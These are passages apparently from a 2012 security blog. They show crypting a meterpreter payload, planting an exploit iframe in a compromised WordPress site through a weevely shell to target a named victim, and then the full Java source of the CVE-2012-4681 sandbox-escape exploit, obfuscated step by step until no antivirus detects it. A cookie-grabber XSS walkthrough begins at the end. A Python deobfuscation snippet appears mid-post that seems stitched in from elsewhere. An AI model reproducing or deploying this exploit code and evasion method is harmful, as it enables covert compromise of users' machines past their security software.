As you can imagine, this executable will be detected by most antivirus products, even if we use encoders. The best solution would be to create your own crypter, since all the crypters you can find online aren't FUD, because they are public. I don't have time to create my own (and I don't know how to do it), but one day I will. On this page there are a few crypters claiming to be Fully Undetectable; I chose 0vcrypter because it can bypass Microsoft detection.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-JKnH40ZjuoI/ULuSozpvhqI/AAAAAAAAAb4/9Yl5VuRRcW0/s1600/crypter.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://2.bp.blogspot.com/-JKnH40ZjuoI/ULuSozpvhqI/AAAAAAAAAb4/9Yl5VuRRcW0/s320/crypter.jpg" width="316" /></a></div>
<br />
Frank lives in the United States and, according to this chart provided by <a href="http://opswat.com/">opswat.com</a>, Microsoft Security Essentials is the most widespread antivirus there. With its default adoption in Windows 8, this percentage will increase even more in the coming months.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-PKHswUy0wBo/ULt-aWxozcI/AAAAAAAAAbE/Y4OOL2uAnnY/s1600/av_market_share.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="299" src="http://1.bp.blogspot.com/-PKHswUy0wBo/ULt-aWxozcI/AAAAAAAAAbE/Y4OOL2uAnnY/s640/av_market_share.jpg" width="640" /></a></div>
<br />
After crypting our meterpreter shell and renaming it java.exe, we have all the files we need:<br />
<ul>
<li>page.html (landing page)</li>
<li>PluginDetect.js</li>
<li>java.jar (exploit)</li>
<li>java.exe (meterpreter shell)</li>
</ul>
Now we can upload all these files to a remote host.<br />
<br />
If you remember, in the previous video we left a weevely shell on his site, so now we can connect to it and modify <b>admin-header.php</b>, located in the <b>wp-admin</b> folder.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-5T0a996Fzhk/ULuSi54kCVI/AAAAAAAAAbw/3fnxEalY2q0/s1600/add_iframe.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="380" src="http://1.bp.blogspot.com/-5T0a996Fzhk/ULuSi54kCVI/AAAAAAAAAbw/3fnxEalY2q0/s640/add_iframe.jpg" width="640" /></a></div>
<br />
Now start a meterpreter listener and, if we are lucky and Frank has a vulnerable version of Java, our shell will be dropped correctly.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-rWKVlVXyNp4/ULuScV-KD7I/AAAAAAAAAbo/NfRXxiJU4d4/s1600/connect_back.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="376" src="http://4.bp.blogspot.com/-rWKVlVXyNp4/ULuScV-KD7I/AAAAAAAAAbo/NfRXxiJU4d4/s640/connect_back.jpg" width="640" /></a></div>
<br />
Once we have a meterpreter session we can do a lot of things, but for now we just take a screenshot of the desktop.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-36xVE-n8fPU/ULuSPeQyNyI/AAAAAAAAAbg/MzdDMx-LEyo/s1600/victim_desktop.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="359" src="http://2.bp.blogspot.com/-36xVE-n8fPU/ULuSPeQyNyI/AAAAAAAAAbg/MzdDMx-LEyo/s640/victim_desktop.jpg" width="640" /></a></div>
<br />
Enjoy the video.<br />
<br />
<iframe allowfullscreen="allowfullscreen" frameborder="0" height="360" src="http://www.youtube.com/embed/SMDr7Y2yVAs" width="640"></iframe><br />
<br />
Reference:<br />
<ul>
<li><a href="http://www.invisiblehackers.in/2012/04/make-your-keylogger-to-undetectable.html">http://www.invisiblehackers.in/2012/04/make-your-keylogger-to-undetectable.html</a></li>
<li><a href="http://www.opswat.com/about/media/reports/antivirus-september-2012">http://www.opswat.com/about/media/reports/antivirus-september-2012</a></li>
</ul>
Security Obscurityhttp://www.blogger.com/profile/06688159457167595136noreply@blogger.com3tag:blogger.com,1999:blog-3423828846307461333.post-43328807635792982072012-11-15T08:24:00.000+01:002012-12-13T08:57:58.003+01:00Java Exploit Code Obfuscation and Antivirus Bypass/Evasion (CVE-2012-4681)Why not play a game where we try to make the latest (at time of writing) public java exploit (<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2012-4681">CVE-2012-4681</a>) undetected by all antivirus and see who will be the last to detect it ?. I think it will be a funny "challenge" because evading antivirus has always his charm.<br />
<br />
I will not use software obfuscators like ProGuard, Allatori, Zelix KlassMaster etc., because that would not be fun. This is not intended to be an analysis or explanation, because there are already great posts here:<br />
<ul>
<li><a href="http://immunityproducts.blogspot.com.ar/2012/08/java-0day-analysis-cve-2012-4681.html">http://immunityproducts.blogspot.com.ar/2012/08/java-0day-analysis-cve-2012-4681.html</a></li>
<li><a href="http://www.deependresearch.org/2012/08/java-7-vulnerability-analysis.html">http://www.deependresearch.org/2012/08/java-7-vulnerability-analysis.html</a></li>
<li><a href="http://www.h-online.com/security/features/The-new-Java-0day-examined-1677789.html">http://www.h-online.com/security/features/The-new-Java-0day-examined-1677789.html</a></li>
</ul>
<br />
Before we start, we need to make two considerations:<br />
<ul>
<li>From <i><a href="http://www.securelist.com/en/blog/208193822/The_Current_Web_Delivered_Java_0day">The Current Web-Delivered Java 0Day</a>: </i>So while you may see a few links to Virustotal with the inevitable complaining that a scanner is missing a specific chunk of altered code along with inaccurate claims that "AV is dead!" or "AV can't detect it", you should take them for the grain of salt that they are. The real story about client side mass exploitation is more complex than those claims.</li>
<li>The order in which antivirus products are bypassed mainly depends on how I modify the exploit/flow.</li>
</ul>
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;">Last Antivirus Standing</span></b></div>
<br />
Who will be the last? Make your guess.<br />
<br />
Let's start by just copying the code from jduck's PoC, taken from here: <a href="http://pastie.org/4594319">http://pastie.org/4594319</a>. Upload the compiled applet (.class file) to VirusTotal and we start with a detection of 23/43; the first popular products to fall are Kaspersky, McAfee and Panda.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-8gdHwVo4rkY/UJ93lENwsrI/AAAAAAAAAW4/OVK6dYHBaVc/s1600/av_23_44_complete.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-8gdHwVo4rkY/UJ93lENwsrI/AAAAAAAAAW4/OVK6dYHBaVc/s1600/av_23_44_complete.jpg" /></a></div>
<br />
Virustotal link <a href="https://www.virustotal.com/file/0fbeaac1828564bf177f552d812b16809c8e57b4b215e1d864fda1f13aee1044/analysis/1351439396/">here</a>.<br />
Full image <a href="https://lh3.googleusercontent.com/--hNolEfuOdg/UJJDkoDeDUI/AAAAAAAAATY/cZOJ8GFHOxo/h120/23_44.png">here</a>.<br />
<br />
One important thing is strings; as you can see there are a few of them, for example sun.awt.SunToolkit, file://, forName etc. One step to bring down detection is to obfuscate these strings. For example, sun.awt.SunToolkit will become a char array. There are a lot of other ways to obfuscate a string, for example using StringBuilder, hex to ASCII, decimal to ASCII, String.replace and so on.<br />
<br />
<pre class="brush: java">// setSecurityManager
String secMan = "22s234e34523454tS345e334545c345u5356r67i6t6y4354834M90a6n4a4g345e34r34";
//sun.awt.SunToolkit
char sun[] = {'s','u','n','.','a','w','t','.','S','u','n','T','o','o','l','k','i','t'};
// file
char file[] = {(char)102,(char)105,(char)108,(char)101,(char)58,(char)47,(char)47,(char)47};
// forName
String ad = "or",me = "me", aw = "f", kl = "Na";
// getField
String field = "789g8795e456"+"5t5765F5675"+"567i6765e756"+"567l567d567";
</pre>
<br />
Once done, compile and upload it again.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-JrnQM4DfQbQ/UJPkhopwD-I/AAAAAAAAAUY/IFGh4CAcbUo/s1600/av_9_44.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-JrnQM4DfQbQ/UJPkhopwD-I/AAAAAAAAAUY/IFGh4CAcbUo/s1600/av_9_44.jpg" /></a></div>
<br />
Virustotal link <a href="https://www.virustotal.com/file/3c53f93ec24f6188b2921747d978821ada493694024686b4ec5d289d3e1988ed/analysis/1351446739/">here</a>.<br />
Full image <a href="http://3.bp.blogspot.com/-6JAm7zRK5BQ/UKKgkxJBEjI/AAAAAAAAAXo/DllMRLKKdI0/s1600/11-44.png">here</a>.<br />
Code <a href="http://pastebin.com/63GQx6Fx">here</a>.<br />
<br />
As you can see, just obfuscating a bunch of strings can decrease antivirus detection. Twelve antivirus products are out of the game; the most notable defeats are Microsoft, Symantec, TrendMicro and DrWeb.<br />
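The detection drop above is the flip side of a scanner matching raw string constants: once the API names are digit-stuffed, split into concatenated literals or turned into char arrays, a byte-level signature no longer sees them. The Python below is an added analyst-side example (not the post's code and not any vendor's engine): it folds exactly those three constructions back into their run-time values over a constructed copy of the declarations shown above and flags the ones that resolve to the API names the exploit needs. It assumes the source is plain decompiled Java text and only folds literal initializers; nothing is executed.

```python
import re
from typing import Dict, Iterator

# Constructed input: the obfuscated declarations quoted on the page, plus the
# forName call site, as an analyst would see them in decompiled source.
SAMPLE_SOURCE = r'''
String secMan = "22s234e34523454tS345e334545c345u5356r67i6t6y4354834M90a6n4a4g345e34r34";
char sun[] = {'s','u','n','.','a','w','t','.','S','u','n','T','o','o','l','k','i','t'};
char file[] = {(char)102,(char)105,(char)108,(char)101,(char)58,(char)47,(char)47,(char)47};
String ad = "or",me = "me", aw = "f", kl = "Na";
String field = "789g8795e456"+"5t5765F5675"+"567i6765e756"+"567l567d567";
Expression le = new Expression(Class.class, aw+ad+kl+me, new Object[] {ps});
'''

# API names the post shows being hidden. "file:///" is the decoded value of the
# char array above (the prose abbreviates it as file://).
SENSITIVE = {"setSecurityManager", "sun.awt.SunToolkit", "getField", "forName", "file:///"}

_LITERAL_DECL = re.compile(r'(\w+)\s*=\s*((?:"[^"]*"\s*\+?\s*)+)')      # name = "a"+"b"
_CHAR_ARRAY = re.compile(r'char\s+(\w+)\s*\[\]\s*=\s*\{([^}]*)\}')       # char x[] = {...}
_IDENT_CONCAT = re.compile(r'\b([A-Za-z_]\w*(?:\s*\+\s*[A-Za-z_]\w*)+)')  # aw+ad+kl+me


def join_literals(expr: str) -> str:
    """"a"+"b" -> "ab": adjacent literals glued by + are one constant at run time."""
    return "".join(re.findall(r'"([^"]*)"', expr))


def decode_char_array(body: str) -> str:
    """Turn {'s','u'} or {(char)102,(char)105} initializers back into a string."""
    out = []
    for elem in body.split(","):
        elem = elem.strip()
        m = re.fullmatch(r"'(.)'", elem)
        if m:
            out.append(m.group(1))
            continue
        m = re.fullmatch(r"\(char\)\s*(\d+)", elem)
        if m:
            out.append(chr(int(m.group(1))))
            continue
        raise ValueError(f"unsupported char initializer: {elem!r}")
    return "".join(out)


def recover_strings(src: str) -> Dict[str, str]:
    """Map each constant-valued name, and each + chain of such names, to its
    run-time value. Only literal initializers are folded; no Java is executed."""
    env: Dict[str, str] = {}
    for name, expr in _LITERAL_DECL.findall(src):
        env[name] = join_literals(expr)
    for name, body in _CHAR_ARRAY.findall(src):
        env[name] = decode_char_array(body)
    found = dict(env)
    for chain in _IDENT_CONCAT.findall(src):
        parts = [p.strip() for p in chain.split("+")]
        if all(p in env for p in parts):
            found[chain] = "".join(env[p] for p in parts)
    return found


def normalizations(value: str) -> Iterator[str]:
    """Candidate de-obfuscations of one constant. The digit strip mirrors the
    replaceAll on a digit class that the applet applies before using the string."""
    yield value
    stripped = re.sub(r"\d", "", value)
    if stripped != value:
        yield stripped


def flag_sensitive(src: str) -> Dict[str, str]:
    """Return {name_or_expression: api_name} for every constant that, after
    normalization, equals one of the API names the exploit depends on."""
    hits: Dict[str, str] = {}
    for name, value in recover_strings(src).items():
        for cand in normalizations(value):
            if cand in SENSITIVE:
                hits[name] = cand
                break
    return hits


if __name__ == "__main__":
    for name, api in flag_sensitive(SAMPLE_SOURCE).items():
        print(f"{name} -> {api}")
```

The same folding generalizes to any scanner that works on decompiled source rather than on class-file bytes; what it cannot undo is string material built at run time from non-literal inputs.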
<br />
Now we can clean up the code a bit, because we don't need functions like paint. In addition we change the applet name from Gondvv to Java and merge the code from setField into disableSecurity; having a function named disableSecurity is not a good thing. Now the code will look like this.<br />
<br />
<pre class="brush: java">public class Java extends Applet
{
    // setSecurityManager
    String secMan = "22s234e34523454tS345e334545c345u5356r67i6t6y4354834M90a6n4a4g345e34r34";
    //sun.awt.SunToolkit
    char sun[] = {'s','u','n','.','a','w','t','.','S','u','n','T','o','o','l','k','i','t'};
    // file
    char file[] = {(char)102,(char)105,(char)108,(char)101,(char)58,(char)47,(char)47,(char)47};
    // forName
    String ad = "or",me = "me", aw = "f", kl = "Na";
    // getField
    String field = "789g8795e456"+"5t5765F5675"+"567i6765e756"+"567l567d567";
    public void enableSecurity() throws Throwable
    {
        Statement localStatement = new Statement(System.class, secMan.replaceAll("\\d",""), new Object[1]);
        Permissions localPermissions = new Permissions();
        localPermissions.add(new AllPermission());
        ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL(new String(file)), new Certificate[0]), localPermissions);
        AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] {
            localProtectionDomain
        });
        Object arrayOfObject[] = new Object[2];
        arrayOfObject[0] = Statement.class;
        arrayOfObject[1] = "a"+"c"+"c";
        Expression localExpression = new Expression(GetClass(new String(sun)), field.replaceAll("\\d",""), arrayOfObject);
        localExpression.execute();
        ((Field)localExpression.getValue()).set(localStatement, localAccessControlContext);
        localStatement.execute();
    }
    public void init()
    {
        try
        {
            enableSecurity();
            Runtime.getRuntime().exec("calc");
        }
        catch(Throwable t){}
    }
    private Class GetClass(String paramString) throws Throwable
    {
        Object arrayOfObject[] = new Object[1];
        arrayOfObject[0] = paramString;
        Expression localExpression = new Expression(Class.class, aw+ad+kl+me, arrayOfObject);
        localExpression.execute();
        return (Class)localExpression.getValue();
    }
}
</pre>
<br />
Once again, compile and reupload.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-Vhvcefc61oA/UJPoi_qNKnI/AAAAAAAAAUw/tSyfEFkdwiI/s1600/av_9_44.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-Vhvcefc61oA/UJPoi_qNKnI/AAAAAAAAAUw/tSyfEFkdwiI/s1600/av_9_44.jpg" /></a></div>
<br />
<br />
Virustotal link <a href="https://www.virustotal.com/file/e76e179656fe15e4ed6f7611246911c764654ccc7ae646ce1bfb728322d55b0a/analysis/1351447836/">here</a>.<br />
Full image <a href="http://4.bp.blogspot.com/-8QcYI4JmhQ0/UKKy3w13utI/AAAAAAAAAYM/aX4fYKbTVng/s1600/9-44.png">here</a>.<br />
<br />
The ratio is 9/44: Avast and MicroWorld-eScan fall to a simple function/class renaming. Now we modify the flow a bit and rename all variables; for example <b>localPermissions</b> becomes <b>pe</b>. Once again upload to VirusTotal.<br />
<br />
Damn, the detection ratio is still 9/44 (same picture above). How can we drop detection? Simple: do the same thing, but in another way. When I try to make an exploit undetected by antivirus, I start testing line by line, following the flow of the exploit, to see which line triggers some antivirus. In this case, from line 32 we start triggering F-Secure.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-5X56Y0OuuWs/UJQImhFZivI/AAAAAAAAAVI/LMhi1rTPIhs/s1600/line_32.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-5X56Y0OuuWs/UJQImhFZivI/AAAAAAAAAVI/LMhi1rTPIhs/s1600/line_32.jpg" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-rIN2hFMqAio/UJ-7WNfu4pI/AAAAAAAAAXQ/WcYX6v48Kd8/s1600/fsecure_1_44.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-rIN2hFMqAio/UJ-7WNfu4pI/AAAAAAAAAXQ/WcYX6v48Kd8/s1600/fsecure_1_44.jpg" /></a></div>
<br />
<br />
Another tip is to remove some variables and see if the detection ratio changes; in this case, if we remove <b>Statement.class</b> and substitute it with null, detection goes from 9/44 to 7/44.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-LIjAmnySAzY/UJQJM4YnNUI/AAAAAAAAAVQ/fe9upDC1cjw/s1600/null_statement.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-LIjAmnySAzY/UJQJM4YnNUI/AAAAAAAAAVQ/fe9upDC1cjw/s1600/null_statement.jpg" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-McKilnCkx4s/UKK1KO9qujI/AAAAAAAAAYU/mVvYtf-26ec/s1600/av_7_44_test.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-McKilnCkx4s/UKK1KO9qujI/AAAAAAAAAYU/mVvYtf-26ec/s1600/av_7_44_test.jpg" /></a></div>
<br />
Virustotal link <a href="https://www.virustotal.com/file/3da0e1996c8367eae5e45fe7f19b242cb4ba3545e14496ef9582fe3711dcec59/analysis/">here</a>.<br />
<br />
So, can I retrieve the Statement class in another way? For sure, and we have the method right under our nose: instead of using other ways like <b>Class.forName("Statement")</b>, we can use GimmeClass.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-_gbfM5zGXek/UJQJ7xphfrI/AAAAAAAAAVY/Gr5kNwDQi8w/s1600/gimme_class-statement.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-_gbfM5zGXek/UJQJ7xphfrI/AAAAAAAAAVY/Gr5kNwDQi8w/s1600/gimme_class-statement.jpg" /></a></div>
<br />
Upload the .class file to VirusTotal again and let's see if that works.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-pnty93d8c_E/UJQLD4lZimI/AAAAAAAAAVg/QCkaq_tTG3Y/s1600/7_44.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-pnty93d8c_E/UJQLD4lZimI/AAAAAAAAAVg/QCkaq_tTG3Y/s1600/7_44.jpg" /></a></div>
<br />
Virustotal link <a href="https://www.virustotal.com/file/c2150862a76a0d4fe88f01f021135d36ba18e462b616e9674f487e64c6a8066d/analysis/1351458807/">here</a>.<br />
Full image <a href="http://2.bp.blogspot.com/-lD378ozKfCQ/UKP1sYN5gwI/AAAAAAAAAZU/kOMtCWQ32t0/s320/7-44.png">here</a>.<br />
<br />
Code <a href="http://pastebin.com/cdD7FU2m">here</a>.<br />
<br />
<pre class="brush: java">public class Java extends Applet
{
    // setSecurityManager
    String secMan = "22s234e34523454tS345e334545c345u5356r67i6t6y4354834M90a6n4a4g345e34r34";
    //sun.awt.SunToolkit
    char sun[] = {'s','u','n','.','a','w','t','.','S','u','n','T','o','o','l','k','i','t'};
    // file
    char file[] = {(char)102,(char)105,(char)108,(char)101,(char)58,(char)47,(char)47,(char)47};
    // forName
    String ad = "or",me = "me", aw = "f", kl = "Na";
    // getField
    String field = "789g8795e456"+"5t5765F5675"+"567i6765e756"+"567l567d567";
    public void enableSecurity() throws Throwable
    {
        Object ao[] = new Object[2];
        ao[0] = GimmeClass("java.beans.Statement"); //Statement.class;
        ao[1] = "a"+"c"+"c";
        Expression e = new Expression(GimmeClass(new String(sun)), field.replaceAll("\\d",""), ao);
        e.execute();
        Field field = (Field)e.getValue();
        Permissions pe = new Permissions();
        pe.add(new AllPermission());
        CodeSource cs = new CodeSource(new URL(new String(file)), new Certificate[0]);
        ProtectionDomain pd = new ProtectionDomain(cs, pe);
        AccessControlContext ac = new AccessControlContext(new ProtectionDomain[] { pd });
        Statement stat = new Statement( System.class,secMan.replaceAll("\\d",""), new Object[1]);
        field.set(stat, ac);
        stat.execute();
    }
    public void init()
    {
        try
        {
            enableSecurity();
            Runtime.getRuntime().exec("calc");
        }
        catch(Throwable t){}
    }
    private Class GimmeClass(String ps) throws Throwable
    {
        Expression le = new Expression(Class.class, aw+ad+kl+me, new Object[] {ps});
        le.execute();
        return (Class)le.getValue();
    }
}
</pre>
Now the detection ratio is 7/44, and AVG and ESET are gone.<br />
<br />
Again we remove some parts of the code to see where detection changes. If we delete the last three lines of code, detection will be 0/44. But these lines instantiate a class and call a method; how can we do this in another way? Simple, we use reflection.<br />
<br />
From <a href="http://stackoverflow.com/questions/37628/what-is-reflection-and-why-is-it-useful">Stackoverflow</a>:<br />
<blockquote class="tr_bq">
The name reflection is used to describe code which is able to inspect other code in the same system (or itself).<br />
For example, say you have an object of an unknown type in Java, and you would like to call a 'doSomething' method on it if one exists. Java's static typing system isn't really designed to support this unless the object conforms to a known interface, but using reflection, your code can look at the object and find out if it has a method called 'doSomething', and then, call it if you want to.</blockquote>
Using the Java documentation from <a href="http://docs.oracle.com/javase/tutorial/reflect/member/ctorInstance.html">here</a> and <a href="http://docs.oracle.com/javase/tutorial/reflect/member/methodInvocation.html">there</a>, we instantiate a class and call two methods with reflection.<br />
<br />
Before:<br />
<pre class="brush: java">Statement stat = new Statement( System.class,secMan.replaceAll("\\d",""), new Object[1]);
field.set(stat, ac);
stat.execute();</pre>
<br />
After:<br />
<pre class="brush: java">Class statClass = GimmeClass("java.beans.Statement");
Constructor con = statClass.getConstructor(new Class[]{ Object.class, String.class, Object[].class});
Object stat = con.newInstance(GimmeClass("java.lang.System"),secMan.replaceAll("\\d",""), new Object[1]);
field.set(stat, ac);
Method m = stat.getClass().getMethod("execute");
m.invoke(stat);</pre>
<br />
First we check that the exploit still works, to see if we messed something up; it does. OK, now upload it to VirusTotal and it should be a nice 0/44 detection...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-Pu4vcFndwHA/UJQNt72sqwI/AAAAAAAAAV4/vUbDpvTP7MA/s1600/av_1_44_microsoft.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-Pu4vcFndwHA/UJQNt72sqwI/AAAAAAAAAV4/vUbDpvTP7MA/s1600/av_1_44_microsoft.jpg" /></a></div>
<br />
<br />
Virustotal link <a href="https://www.virustotal.com/file/7c0af034c7a4a0dc8f1852737aca5eea8166c339a0562f453cbc046032aacac7/analysis/1351538626/">here</a>.<br />
Full image <a href="http://4.bp.blogspot.com/-ZKzvwAYcBzY/UKK4g1jL4sI/AAAAAAAAAYw/pC5BNvcNuc4/s1600/1-44.png">here</a>.<br />
Code <a href="http://pastebin.com/b3hfYD8x">here</a>.<br />
Damn, we were so close. One antivirus detects our exploit. Guess who is back?<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-q0B02HRpPQ0/UJAo_hHQc8I/AAAAAAAAASo/776J9hZgh5U/s1600/microsoft-security-essentials.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="193" src="http://2.bp.blogspot.com/-q0B02HRpPQ0/UJAo_hHQc8I/AAAAAAAAASo/776J9hZgh5U/s320/microsoft-security-essentials.jpg" width="320" /></a></div>
<br />
Since it is the last one to detect our exploit, Microsoft Security Essentials is the winner of this small competition. This post can't end here, because we want to make our exploit fully undetectable. Take a look at the two lines below.<br />
<br />
<pre class="brush: java">Permissions pe = new Permissions();
pe.add(new AllPermission());
</pre>
<br />
Why not use reflection? Then they become:<br />
<br />
<pre class="brush: java">Class alPerm = Class.forName("java.security.AllPermission");
Class perm = GimmeClass("java.security.Permissions");
Object pe= perm.newInstance();
Method method = pe.getClass().getMethod("add", GimmeClass("java.security.Permission"));
method.invoke(pe, alPerm.newInstance());
</pre>
<br />
Once uploaded to VirusTotal, the detection ratio is ...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-kdIbxPH5wxw/UJQPRWueEsI/AAAAAAAAAWA/MxH6afmCv7o/s1600/av_0_44.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-kdIbxPH5wxw/UJQPRWueEsI/AAAAAAAAAWA/MxH6afmCv7o/s1600/av_0_44.jpg" /></a></div>
<br />
Virustotal Link <a href="https://www.virustotal.com/file/c430160c0c513163a9d0cc9ab37f63441608921fad1e71af2f13ead060c3a6b9/analysis/1351543728/">here</a>.<br />
Full image <a href="http://3.bp.blogspot.com/-rWQOXW9yPy8/UKK41xvqXrI/AAAAAAAAAY4/YZhgcxi6rm0/s1600/0-44.png">here</a>.<br />
Code <a href="http://pastebin.com/DbsaQTDw">here</a>.<br />
<br />
Great! If we create a jar file, will it be detected?<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-3DmEHpAQknw/UJbTp9CycWI/AAAAAAAAAWY/wQCxle618Wc/s1600/av_00_jar.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-3DmEHpAQknw/UJbTp9CycWI/AAAAAAAAAWY/wQCxle618Wc/s1600/av_00_jar.jpg" /></a></div>
<br />
Virustotal link <a href="https://www.virustotal.com/file/0861c3511f7540779a370559e869796ab9dbab3ffb9b30b9d58d0a7d5c10b1a8/analysis/1352061632/">here</a>.<br />
<br />
As with the class file, it is not detected.<br />
<br />
Now we can test it on a Windows machine with Security Essentials installed to see if it really works. For this test I used Windows 8, which has Windows Defender (Security Essentials) installed by default.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-THtpvyuKZUI/UI7w_Ck5gWI/AAAAAAAAASI/QdltgMov4e0/s1600/win8_bypass_windef.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="346" src="http://3.bp.blogspot.com/-THtpvyuKZUI/UI7w_Ck5gWI/AAAAAAAAASI/QdltgMov4e0/s640/win8_bypass_windef.jpg" width="640" /></a></div>
<br />
It works! I know this can't prove anything (it's just a picture), but soon I will post a video about this. You can find the video <a href="http://security-obscurity.blogspot.com/2012/12/attacking-windows-8-with-java-exploit.html">here</a>.<br />
<br />
Hope you enjoyed.<br />
<br />
Step by step java exploit code: <a href="http://pastebin.com/63GQx6Fx">1/5</a>, <a href="http://pastebin.com/RRssd4wk">2/5</a>, <a href="http://pastebin.com/cdD7FU2m">3/5</a>, <a href="http://pastebin.com/b3hfYD8x">4/5</a>, <a href="http://pastebin.com/DbsaQTDw">5/5</a>.<br />
<br />
References:<br />
- <a href="http://docs.oracle.com/javase/tutorial/reflect/member/ctorInstance.html">Creating new class instances</a><br />
- <a href="http://docs.oracle.com/javase/tutorial/reflect/member/methodInvocation.html">Invoking methods</a><br />
- <a href="http://stackoverflow.com/questions/95419/what-are-all-the-different-ways-to-create-an-object-in-java">What are all the different ways to create an object in Java?</a><br />
- <a href="http://stackoverflow.com/questions/160970/how-do-i-invoke-a-java-method-when-given-the-method-name-as-a-string">How do I invoke a java method when given the method name as a string?</a><br />
<br />
<b>Wordpress Cookie Grabber</b><br />
Posted by Security Obscurity on 2012-11-02.<br />
<br />
In a previous video, <a href="http://www.youtube.com/watch?v=BXmXEKfxZQc">Wordpress XSS + Internet Explorer 8 Exploit</a>, I showed you how you can use a Cross-site scripting vulnerability to redirect a victim who uses Internet Explorer to a malicious site containing an exploit for version 8. Another way is to use it as a cookie grabber.<br />
<br />
From Wikipedia:<br />
<blockquote class="tr_bq">
<span style="font-family: sans-serif;"><span style="line-height: 19.200000762939453px;"><i>A cookie, also known as an HTTP cookie, web cookie, or browser cookie, is usually a small piece of data sent from a website and stored in a user's web browser while a user is browsing a website. When the user browses the same website in the future, the data stored in the cookie can be retrieved by the website to notify the website of the user's previous activity.</i></span></span></blockquote>
Basically, when a user visits the "infected" page, all cookies of that domain will be sent to a script which stores the information in a file/db or sends it via email to the attacker.<br />
<br />
After selecting our WordPress target (franksite.dot/wordpress) we use a vulnerability scanner called <b>wpscan</b>, developed by <a href="https://twitter.com/ethicalhack3r">ethicalhack3r</a>, which is able to gather useful information such as:<br />
<ul>
<li>WordPress version</li>
<li>WordPress vulnerabilities (link to exploit-db)</li>
<li>all installed plugins</li>
<li>plugin vulnerabilities (link to exploit-db)</li>
</ul>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-DUXplcBeL1c/UHlXLI3cwEI/AAAAAAAAAQ4/V1oL6aPV-yY/s1600/wpscan_wordpress_grabber.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-DUXplcBeL1c/UHlXLI3cwEI/AAAAAAAAAQ4/V1oL6aPV-yY/s1600/wpscan_wordpress_grabber.jpg" /></a></div>
<br /></div>
<div>
As we can see, there is a plugin installed called <a href="http://wordpress.org/extend/plugins/count-per-day/">Count per Day</a> which seems to be vulnerable. The results on exploit-db point to two vulnerabilities for two different versions, so first we have to check which version is installed. As with many plugins, inside its folder there is a file with the current version, changelog, etc. This plugin isn't different, and since its folder is publicly accessible you can see all the files.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
